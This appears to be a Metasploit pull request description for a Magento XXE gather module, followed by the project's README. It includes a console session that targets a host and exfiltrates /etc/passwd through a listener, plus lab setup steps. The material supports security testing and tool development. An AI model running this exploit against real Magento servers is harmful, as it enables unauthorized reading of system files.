jvoisin
ec6540b806
```
jvoisin@kaa 16:10 /opt/msf ./msfconsole
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v4.11.5-dev-9a0f0a7 ]
+ -- --=[ 1505 exploits - 867 auxiliary - 251 post ]
+ -- --=[ 434 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use auxiliary/gather/magento_xxe
msf auxiliary(magento_xxe) > set RPORT 8080
RPORT => 8080
msf auxiliary(magento_xxe) > set SRVHOST 192.168.1.11
SRVHOST => 192.168.1.11
msf auxiliary(magento_xxe) > setg RHOST 192.168.1.25
RHOST => 192.168.1.25
msf auxiliary(magento_xxe) > show options
Module options (auxiliary/gather/magento_xxe):
Name Current Setting Required Description
---- --------------- -------- -----------
FILEPATH /etc/passwd yes The filepath to read on the server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.1.25 yes The target address
RPORT 8080 yes The target port
SRVHOST 192.168.1.11 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base Magento directory path
URIPATH fetch.php yes The URI path to use for this exploit to get the data back
VHOST no HTTP server virtual host
msf auxiliary(magento_xxe) > run
[*] Using URL: http://192.168.1.11:8080/fetch.php
[*] Server started.
[*] 192.168.1.25 magento_xxe - Got an answer from the server.
[+] 192.168.1.25 magento_xxe - File /etc/passwd found and saved to path: /home/jvoisin/.msf4/loot/20151113163706_default_192.168.1.25_magento.file_415167.txt
[*] Server stopped.
[*] Auxiliary module execution completed
```
1. [ ] Get the "Community Edition" of magento on [its website]( https://www.magentocommerce.com/download ) (Feel free to use bugmenot@mailinator.com/Password1 to log in)
2. [ ] Install nginx and php-fpm. This is the configuration that I used:
```
server {
listen 0.0.0.0:8080 default;
listen 192.168.1.25:8080;
server_name _;
root /var/www2/;
index index.php;
location = /js/index.php/x.js { rewrite ^(.*\.php)/ $1 last; }
location / { try_files $uri $uri/ @rewrite; }
location @rewrite { rewrite / /index.php?$args; }
location ~ \.php$ {
try_files $uri =404;
fastcgi_pass unix:/var/run/php5-fpm.sock;
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
include fastcgi_params;
}
}
```
3. [ ] Launch metasploit, `use auxiliary/gather/magento_xxe`, set
options
4. [ ] Get your file exfiltrated in your loot.
1. The XML is hand-crafted because I don't know how to Nokogiri
2. I'm quite sure that the `service.stop` in the `primer` function is
wrong. What is the regular way to handle this?
Metasploit 
The Metasploit Framework is released under a BSD-style license. See COPYING for more details.
The latest version of this software is available from: https://metasploit.com
Bug tracking and development information can be found at: https://github.com/rapid7/metasploit-framework
New bugs and feature requests should be directed to: http://r-7.co/MSF-BUGv1
API documentation for writing modules can be found at: https://rapid7.github.io/metasploit-framework/api
Questions and suggestions can be sent to: https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
Installing
Generally, you should use the free installer, which contains all of the dependencies and will get you up and running with a few clicks. See the Dev Environment Setup if you'd like to deal with dependencies on your own.
Using Metasploit
Metasploit can do all sorts of things. The first thing you'll want to do
is start msfconsole, but after that, you'll probably be best served by
reading Metasploit Unleashed, the great community
resources, or the wiki.
Contributing
See the Dev Environment Setup guide on GitHub, which will walk you through the whole process from installing all the dependencies, to cloning the repository, and finally to submitting a pull request. For slightly more information, see Contributing.